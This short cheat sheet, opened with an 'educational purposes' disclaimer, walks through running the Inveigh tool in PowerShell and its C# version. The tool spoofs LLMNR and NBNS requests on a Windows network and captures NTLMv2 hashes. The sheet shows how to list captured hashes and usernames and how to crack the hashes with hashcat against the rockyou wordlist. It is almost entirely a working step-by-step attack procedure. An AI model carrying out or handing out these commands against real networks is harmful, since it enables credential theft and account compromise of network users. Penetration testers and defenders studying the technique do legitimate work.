Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
RUNNING INVEIGH IN POWERSHELL
- Load the Inveigh module into PowerShell:
Import-Module .\Inveigh.ps1
- Check the available parameters for the Invoke-Inveigh cmdlet to understand its options.
(Get-Command Invoke-Inveigh).Parameters
- Run Inveigh to start spoofing LLMNR and NBNS requests, with console and file output enabled.
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
USING INVEIGHZERO (C# VERSION)
- Run the C# version of Inveigh:
.\Inveigh.exe
- Interactive Console
Press ESC to enter the interactive console.
- Use the following commands within the interactive console to get specific information:
- Get one captured NTLMv2 hash per user:
GET NTLMV2UNIQUE
- Get usernames and source IPs/hostnames:
GET NTLMV2USERNAMES
STEP-BY-STEP ATTACK EXECUTION
- Start Inveigh with Default Settings:
Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
- Use the console commands to check captured hashes and usernames.
- Captured hashes are stored in the specified output directory. By default, they are saved in
C:\Tools.
- Prepare Hashes for Cracking Ensure the hashes are in a compatible format for Hashcat.
- Run Hashcat:
hashcat -m 5600 hash_file.txt /usr/share/wordlists/rockyou.txt